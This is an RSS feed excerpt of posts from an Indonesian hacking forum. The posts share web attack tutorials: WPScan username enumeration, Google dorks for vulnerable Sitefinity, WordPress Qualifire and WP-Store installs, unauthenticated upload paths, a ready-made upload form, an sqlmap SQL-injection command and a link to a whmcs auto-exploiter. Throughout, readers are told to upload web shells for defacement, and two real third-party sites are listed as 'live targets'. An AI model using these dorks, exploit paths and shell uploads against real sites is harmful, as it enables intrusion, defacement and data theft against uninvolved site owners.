<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">Disini saya menemukan 5 Username, yaitu</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- adminin</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- em2ka</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- riki</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- kartika</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- sihono</span></span></span><br />
<br />
Selanjutnya bijimana ama password nya o.O ?? seperti yang tadi ane bilang di awal..<br />
dh yee gengs , semoga brmanfaat  :cool: <br />
oke saatnya Nue dan tim katakan mampus cabut dlu<br />
#jemputdoidlu  :cool: <br />
<br />
<br />
<a href="http://tkjcyberart.blogspot.co.id/2016/01/tutorial-cara-mendapatkan-username-pada.html" target="_blank" class="mycode_url"><span style="color: #ff3366;" class="mycode_color">SUMUR</span></a>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://lh3.googleusercontent.com/-P-nPxSVr2UM/VxxHz_ZT7TI/AAAAAAAAAqM/YTUB6Sddb_Qctm1SH30ymhdWF6egAGxhQ/w426-h254/linus.jpg" alt="[Image: linus.jpg]" class="mycode_img" /></div>
xixixhi, happy sadnight mblo :v akwkwa<br />
udh ramein porum aje awkkwa, moga thread garing ini bermanfaat bebz  :heart: <br />
<span style="color: #333333;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">WPScan ini di gunakan untuk mengetahui username pada CMS Wordpress dan juga bisa mengetahui Password, namun jika ingin mengetahui passwordnya harus mempunyai wordlist nya.</span></span></span><br />
<br />
<span style="color: #333333;" class="mycode_color">langsung aja deh</span><br />
<br />
Pertama" buka Terminal dan ketik kan<br />
<br />
<span style="color: #ff3366;" class="mycode_color">wpscan -u (target) --enumerate u</span><br />
<br />
<div style="text-align: left;" class="mycode_align"><img src="https://scontent-sin1-1.xx.fbcdn.net/v/t35.0-12/13120487_784689834998705_1965889797_o.png?oh=9cee7f8eb92d85b7e6776fab924091c9&amp;oe=5729B542" alt="[Image: 13120487_784689834998705_1965889797_o.pn...e=5729B542]" class="mycode_img" /></div>
<br />
NB: pada --enumerate u , Huruf "U" itu berarti Username, Jika untuk mencari Password ganti aja dengan Huruf "P".<br />
<br />
Selanjutnya tunggu hingga scanning nya selesai.<br />
<br />
<img src="https://scontent-sin1-1.xx.fbcdn.net/v/t35.0-12/13052536_784689831665372_1432977301_o.png?oh=9e35ce918a2acfd4360a0d6124216575&amp;oe=572981AC" alt="[Image: 13052536_784689831665372_1432977301_o.pn...e=572981AC]" class="mycode_img" /><br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">Jika Sudah selesai akan muncul seperti ini.</span></span></span><br />
<br />
<img src="https://scontent-sin1-1.xx.fbcdn.net/hphotos-xap1/v/t35.0-12/13091751_784689844998704_388074066_o.png?oh=ebabbe56b35d4104a123c5d039dc5f04&amp;oe=57299EE9" alt="[Image: 13091751_784689844998704_388074066_o.png...e=57299EE9]" class="mycode_img" /><br />
<br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">Disini saya menemukan 5 Username, yaitu</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- adminin</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- em2ka</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- riki</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- kartika</span></span></span><br />
<span style="color: #222222;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: arial, helvetica, sans-serif;" class="mycode_font">- sihono</span></span></span><br />
<br />
Selanjutnya bijimana ama password nya o.O ?? seperti yang tadi ane bilang di awal..<br />
dh yee gengs , semoga brmanfaat  :cool: <br />
oke saatnya Nue dan tim katakan mampus cabut dlu<br />
#jemputdoidlu  :cool: <br />
<br />
<br />
<a href="http://tkjcyberart.blogspot.co.id/2016/01/tutorial-cara-mendapatkan-username-pada.html" target="_blank" class="mycode_url"><span style="color: #ff3366;" class="mycode_color">SUMUR</span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[eXploit CMS Sitefinity Editor Dialogs File Upload Vulnerability]]></title>
			<link>https://www.backboxindonesia.or.id/thread-109.html</link>
			<pubDate>Tue, 26 Apr 2016 08:22:40 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-109.html</guid>
			<description><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<div style="text-align: left;" class="mycode_align"><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">xixixhi siang gengs, sorry kalo tutorial cupu hihi #cumasharekok</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">*nyari Bug mulu, nyari pacarnya kapan* xD</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">.</span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">yg dh master minggir dlu beb  :heart:</span></span></div>
<br />
<div style="text-align: left;" class="mycode_align">Dork : <br />
inurl:"/Sitefinity/login.aspx"<br />
"UserControls/Dialogs"<br />
"Sitefinity: Login"</div>
<br />
<div style="text-align: left;" class="mycode_align">Exploit: <span style="color: #ff3333;" class="mycode_color">/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx</span></div>
<br />
<div style="text-align: left;" class="mycode_align">Ciri ciri Vuln o.O ?<br />
Muncul form Upload kak  :D </div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/Ag3acR5.png" alt="[Image: Ag3acR5.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">Langsung Upload Shell/file </div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="color: #333333;" class="mycode_color">Shell/file Akses: <a href="http://www.target.co.li" target="_blank" class="mycode_url">http://www.target.co.li</a></span><span style="color: #cc3333;" class="mycode_color">/Files/namafilemu</span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/xdgQ0wN.png" alt="[Image: xdgQ0wN.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">Live target: </div>
<div style="text-align: left;" class="mycode_align"><a href="http://www.borrowmind.com/files/single.html" target="_blank" class="mycode_url"><span style="color: #3b5998;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">http://www.borrowmind.com/</span></span></span></a><br />
<a href="http://www.belco.org/files/single.html" target="_blank" class="mycode_url"><span style="color: #3b5998;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">http://www.belco.org/</span></span></span></a></div>
<br />
<div style="text-align: left;" class="mycode_align">Yuk yang regional Jakarta Join Grup FB:</div>
<a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">BackBox Jakarta Team</span></a><br />
<br />
<div style="text-align: left;" class="mycode_align">xixihi kunjungin juga blog ane  :rolleyes: <a href="http://tkjcyberart.blogspot.co.id/2016/04/exploit-cms-sitefinity-editor-dialogs.html" target="_blank" class="mycode_url"><span style="color: #ff33cc;" class="mycode_color">TKJ Cyber Art</span></a></div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
</span><span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></div>
<div style="text-align: left;" class="mycode_align">Bye~</div>
<br />
<div style="text-align: left;" class="mycode_align"><a href="http://groosec-squad.blogspot.co.id/2015/06/deface-web-metode-sitefinity-editor.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a></div>]]></description>
			<content:encoded><![CDATA[<div style="text-align: center;" class="mycode_align"><img src="https://1.bp.blogspot.com/-SlQEIGwywP0/Vx8cSITah2I/AAAAAAAAAs4/DVuJ3CGJ2u0-Lyb9Czj5PfvBKuLhFe5iACKgB/s320/bug.jpg" alt="[Image: bug.jpg]" class="mycode_img" /></div>
<div style="text-align: left;" class="mycode_align"><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">xixixhi siang gengs, sorry kalo tutorial cupu hihi #cumasharekok</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">*nyari Bug mulu, nyari pacarnya kapan* xD</span></span><br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">.</span></span><br />
<br />
<span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font">yg dh master minggir dlu beb  :heart:</span></span></div>
<br />
<div style="text-align: left;" class="mycode_align">Dork : <br />
inurl:"/Sitefinity/login.aspx"<br />
"UserControls/Dialogs"<br />
"Sitefinity: Login"</div>
<br />
<div style="text-align: left;" class="mycode_align">Exploit: <span style="color: #ff3333;" class="mycode_color">/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx</span></div>
<br />
<div style="text-align: left;" class="mycode_align">Ciri ciri Vuln o.O ?<br />
Muncul form Upload kak  :D </div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/Ag3acR5.png" alt="[Image: Ag3acR5.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">Langsung Upload Shell/file </div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="color: #333333;" class="mycode_color">Shell/file Akses: <a href="http://www.target.co.li" target="_blank" class="mycode_url">http://www.target.co.li</a></span><span style="color: #cc3333;" class="mycode_color">/Files/namafilemu</span></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://i.imgur.com/xdgQ0wN.png" alt="[Image: xdgQ0wN.png]" class="mycode_img" /></div>
<br />
<div style="text-align: left;" class="mycode_align">Live target: </div>
<div style="text-align: left;" class="mycode_align"><a href="http://www.borrowmind.com/files/single.html" target="_blank" class="mycode_url"><span style="color: #3b5998;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">http://www.borrowmind.com/</span></span></span></a><br />
<a href="http://www.belco.org/files/single.html" target="_blank" class="mycode_url"><span style="color: #3b5998;" class="mycode_color"><span style="font-size: x-small;" class="mycode_size"><span style="font-family: helvetica, arial, sans-serif;" class="mycode_font">http://www.belco.org/</span></span></span></a></div>
<br />
<div style="text-align: left;" class="mycode_align">Yuk yang regional Jakarta Join Grup FB:</div>
<a href="https://www.facebook.com/groups/BackBoxJakartaTeam/" target="_blank" class="mycode_url"><span style="color: #ff3399;" class="mycode_color">BackBox Jakarta Team</span></a><br />
<br />
<div style="text-align: left;" class="mycode_align">xixihi kunjungin juga blog ane  :rolleyes: <a href="http://tkjcyberart.blogspot.co.id/2016/04/exploit-cms-sitefinity-editor-dialogs.html" target="_blank" class="mycode_url"><span style="color: #ff33cc;" class="mycode_color">TKJ Cyber Art</span></a></div>
<br />
<div style="text-align: left;" class="mycode_align"><span style="color: #333333;" class="mycode_color"><span style="font-family: 'PT Sans', Vedrana, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
</span><span style="font-family: Roboto, sans-serif;" class="mycode_font">waktunya Nue dan tim Katakan Putus cabut dulu gengs,   <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" width="21" height="21" alt="[Image: cool.png]" class="mycode_img" /> </span></span></div>
<div style="text-align: left;" class="mycode_align">Bye~</div>
<br />
<div style="text-align: left;" class="mycode_align"><a href="http://groosec-squad.blogspot.co.id/2015/06/deface-web-metode-sitefinity-editor.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit WordPress Qualifire Themes]]></title>
			<link>https://www.backboxindonesia.or.id/thread-78.html</link>
			<pubDate>Tue, 22 Mar 2016 11:54:43 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-78.html</guid>
			<description><![CDATA[Malam Gengs, *nyari bug mulu, kapan nyari pacarnya  :D :D :D <br />
<span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">.</span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">yg dh master minggir dlu beb <img src="http://www.backboxindonesia.or.id/images/smilies/heart.png" alt="[Image: heart.png]" class="mycode_img" /> <br />
</span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Play with Me , Baby <img src="http://www.backboxindonesia.or.id/images/smilies/tongue.png" alt="[Image: tongue.png]" class="mycode_img" /> </span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Dork :</span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">inurl:"/wp-content/themes/qualifire"</span></span></span><br />
<br />
Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe<br />
<br />
<img src="http://i.imgur.com/fVtRWaq.png" alt="[Image: fVtRWaq.png]" class="mycode_img" /><br />
<br />
Copy Script Upload CSRF:<br />
&lt;form<br />
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"<br />
method="post"<br />
enctype="multipart/form-data"&gt;<br />
&lt;label for="file"&gt;Filename:&lt;/label&gt;<br />
&lt;input type="file" name="Filedata" &gt;&lt;br&gt;<br />
&lt;input type="submit" name="submit" value="Submit"&gt;<br />
&lt;/form&gt;<br />
<br />
<br />
lalu tinggal upload file/shell ente.<br />
kalo berhasil muncul angka 1<br />
<br />
<img src="http://i.imgur.com/f8WW5zW.png" alt="[Image: f8WW5zW.png]" class="mycode_img" /><br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">Shell/file Akses: <a href="http://www.target.co.li/filemumas" target="_blank" class="mycode_url">http://www.target.co.li/filemumas</a></span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  <img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /> <br />
</span></span><span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw </span> <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" alt="[Image: cool.png]" class="mycode_img" /> </span></span><br />
<br />
<span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">Bye</span></span></span></span><br />
<br />
<br />
<a href="http://tkjcyberart.blogspot.co.id/2015/05/tutorial-deface-wordpress-themes.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a>]]></description>
			<content:encoded><![CDATA[Malam Gengs, *nyari bug mulu, kapan nyari pacarnya  :D :D :D <br />
<span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span></span></span><span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">.</span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">yg dh master minggir dlu beb <img src="http://www.backboxindonesia.or.id/images/smilies/heart.png" alt="[Image: heart.png]" class="mycode_img" /> <br />
</span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Play with Me , Baby <img src="http://www.backboxindonesia.or.id/images/smilies/tongue.png" alt="[Image: tongue.png]" class="mycode_img" /> </span><br />
<br />
<span style="color: #ffffff;" class="mycode_color">Dork :</span><br />
<span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">inurl:"/wp-content/themes/qualifire"</span></span></span><br />
<br />
Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe<br />
<br />
<img src="http://i.imgur.com/fVtRWaq.png" alt="[Image: fVtRWaq.png]" class="mycode_img" /><br />
<br />
Copy Script Upload CSRF:<br />
&lt;form<br />
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"<br />
method="post"<br />
enctype="multipart/form-data"&gt;<br />
&lt;label for="file"&gt;Filename:&lt;/label&gt;<br />
&lt;input type="file" name="Filedata" &gt;&lt;br&gt;<br />
&lt;input type="submit" name="submit" value="Submit"&gt;<br />
&lt;/form&gt;<br />
<br />
<br />
lalu tinggal upload file/shell ente.<br />
kalo berhasil muncul angka 1<br />
<br />
<img src="http://i.imgur.com/f8WW5zW.png" alt="[Image: f8WW5zW.png]" class="mycode_img" /><br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">Shell/file Akses: <a href="http://www.target.co.li/filemumas" target="_blank" class="mycode_url">http://www.target.co.li/filemumas</a></span></span><br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  <img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /> <br />
</span></span><span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw </span> <img src="http://www.backboxindonesia.or.id/images/smilies/cool.png" alt="[Image: cool.png]" class="mycode_img" /> </span></span><br />
<br />
<span style="color: #aaaaaa;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">Bye</span></span></span></span><br />
<br />
<br />
<a href="http://tkjcyberart.blogspot.co.id/2015/05/tutorial-deface-wordpress-themes.html" target="_blank" class="mycode_url"><span style="color: #ff3333;" class="mycode_color">SUMUR</span></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Auto Exploit whmcs (google + hotbot)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-75.html</link>
			<pubDate>Mon, 21 Mar 2016 07:18:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-75.html</guid>
			<description><![CDATA[:D mau bagi" tools auto exploiter comot di <a href="https://pastebin.com/at0aFXkq" target="_blank" class="mycode_url">https://pastebin.com/at0aFXkq</a><br />
<br />
<br />
POC : <span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">https</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">://www.</span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">exploit</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">-</span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">db.com/exploits</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">/29065/</span></span>]]></description>
			<content:encoded><![CDATA[:D mau bagi" tools auto exploiter comot di <a href="https://pastebin.com/at0aFXkq" target="_blank" class="mycode_url">https://pastebin.com/at0aFXkq</a><br />
<br />
<br />
POC : <span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">https</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">://www.</span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">exploit</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">-</span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">db.com/exploits</span></span></span><span style="color: #006621;" class="mycode_color"><span style="font-family: arial, sans-serif;" class="mycode_font">/29065/</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit  Raw Marketing CMS - SQL Injection Vulnerability]]></title>
			<link>https://www.backboxindonesia.or.id/thread-69.html</link>
			<pubDate>Thu, 17 Mar 2016 08:52:00 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-69.html</guid>
			<description><![CDATA[Salam Kenal, <br />
Member Baru,<br />
<br />
Exploit ini cuma sekedar pembelajaran <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># Exploit Title: Raw Marketing CMS - SQL Injection Vulnerability<br />
# Date: 24/01/2015<br />
# Exploit Author: Local Host<br />
# Author Homepage: pasuruanblackhat.org<br />
# Version: All Version ( Under 2015)<br />
# Tested on: Ubuntu 14.04<br />
 <br />
Overview : <br />
 <br />
        The CMS is vuln on all .php?id= , so you only search .php?id= in the website. you know if the website is use Raw Marketing CMS only give /cms/ in the url . and you can see login admin Raw Marketing CMS, usually the CMS in AU, because the vendor of this CMS is australian people. The SQLI error is not show warning, just show not perfectly page. Iam reported to vendor but not responsive, It's not joke<br />
 <br />
PoC : <br />
 <br />
        http://www.website.com.au -&gt; http://www.website.com.au/product_detail.php?id=1<br />
        sqlmap -u http://www.website.com.au/product_detail.php?id=1 --dbs<br />
 <br />
Greet : <br />
         <br />
        Pasuruan Blackhat &amp; Pasuruan Cyber Crew <br />
        phiA , Alliend , 1pan , h3ll0s , 1nspiron , p3707 , Dark Wireless , h4715 , Sychul</code></div></div><br />
<br />
<br />
Atau bisa lihat disini <a href="http://0day.today/exploit/24844" target="_blank" class="mycode_url">0day.today</a>]]></description>
			<content:encoded><![CDATA[Salam Kenal, <br />
Member Baru,<br />
<br />
Exploit ini cuma sekedar pembelajaran <br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code># Exploit Title: Raw Marketing CMS - SQL Injection Vulnerability<br />
# Date: 24/01/2015<br />
# Exploit Author: Local Host<br />
# Author Homepage: pasuruanblackhat.org<br />
# Version: All Version ( Under 2015)<br />
# Tested on: Ubuntu 14.04<br />
 <br />
Overview : <br />
 <br />
        The CMS is vuln on all .php?id= , so you only search .php?id= in the website. you know if the website is use Raw Marketing CMS only give /cms/ in the url . and you can see login admin Raw Marketing CMS, usually the CMS in AU, because the vendor of this CMS is australian people. The SQLI error is not show warning, just show not perfectly page. Iam reported to vendor but not responsive, It's not joke<br />
 <br />
PoC : <br />
 <br />
        http://www.website.com.au -&gt; http://www.website.com.au/product_detail.php?id=1<br />
        sqlmap -u http://www.website.com.au/product_detail.php?id=1 --dbs<br />
 <br />
Greet : <br />
         <br />
        Pasuruan Blackhat &amp; Pasuruan Cyber Crew <br />
        phiA , Alliend , 1pan , h3ll0s , 1nspiron , p3707 , Dark Wireless , h4715 , Sychul</code></div></div><br />
<br />
<br />
Atau bisa lihat disini <a href="http://0day.today/exploit/24844" target="_blank" class="mycode_url">0day.today</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Exploit WP-Store Upload Vulnerability]]></title>
			<link>https://www.backboxindonesia.or.id/thread-52.html</link>
			<pubDate>Sat, 12 Mar 2016 14:17:28 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-52.html</guid>
			<description><![CDATA[xixixhi malam Gengs, ciee malam minggu yak ? awkawkaw kok gak ngapel x_O? malah sibuknyari exploit dimari awkwka.<br />
*nyari Bug mulu, nyari pacarnya kapan* xD<br />
<span style="font-weight: bold;" class="mycode_b"><span style="color: #ff3366;" class="mycode_color">iseng2 share exploit lama, kali aja masih crotz awkakw</span></span>.<br />
<br />
yg dh master minggir dlu beb :heart: <br />
<br />
Play with Me , Baby :P <br />
<br />
Dork :<br />
inurl:/wp-content/themes/<span style="color: #ff3366;" class="mycode_color">WPstore/</span><br />
<br />
WPStore<br />
eShop<br />
KidzStore<br />
Emporium<br />
Store<br />
eCommerce<br />
framework<br />
frameworkold<br />
Theme bisa diganti *ganti pada bagian belakangnya itu lho*<br />
<br />
Exploit: /wp-content/themes/<span style="color: #ff3366;" class="mycode_color">WPStore/</span>upload/<br />
<br />
<br />
Ciri2 Vuln x_O ?<br />
Muncul tempat Uploader Omz<br />
<br />
<img src="http://i.imgur.com/pIv5zjH.png" alt="[Image: pIv5zjH.png]" class="mycode_img" /><br />
<br />
<br />
langsung ae Upload Shell Lo Gengs..<br />
<br />
Shell Akses: target.co.li/wp-content/uploads/products_img/namashell.php<br />
<br />
<img src="http://i.imgur.com/3sgz1d0.png" alt="[Image: 3sgz1d0.png]" class="mycode_img" /><br />
<br />
Done x_O<br />
<br />
<br />
Baca juga thread gue sebelumnya gengs: <a href="http://www.backboxindonesia.or.id/thread-26.html" target="_blank" class="mycode_url">http://www.backboxindonesia.or.id/thread-26.html</a><br />
Kunjungin Blog saya plis  :D : <a href="http://tkjcyberart.blogspot.co.id/2016/03/deface-dengan-exploit-wp-store-upload.html" target="_blank" class="mycode_url"><span style="color: #33ffff;" class="mycode_color">TKJ Cyber Art</span></a><br />
<br />
<br />
<br />
<span style="color: #ffffff;" class="mycode_color"><span style="font-family: Roboto, sans-serif;" class="mycode_font">semoga bermanfaat Gengs, maap kalo post cupu  </span><img src="http://www.backboxindonesia.or.id/images/smilies/smile.png" alt="[Image: smile.png]" class="mycode_img" /><span style="font-family: Roboto, sans-serif;" class="mycode_font"> </span><br />
</span><span style="font-family: Roboto, sans-serif;" class="mycode_font"><span style="color: #ffffff;" class="mycode_color">waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna mau Ngapel dolo </span> <span style="color: #aaaaaa;" class="mycode_color">:cool:</span> </span><br />
Bye<br />
<br />
<br />
<br />
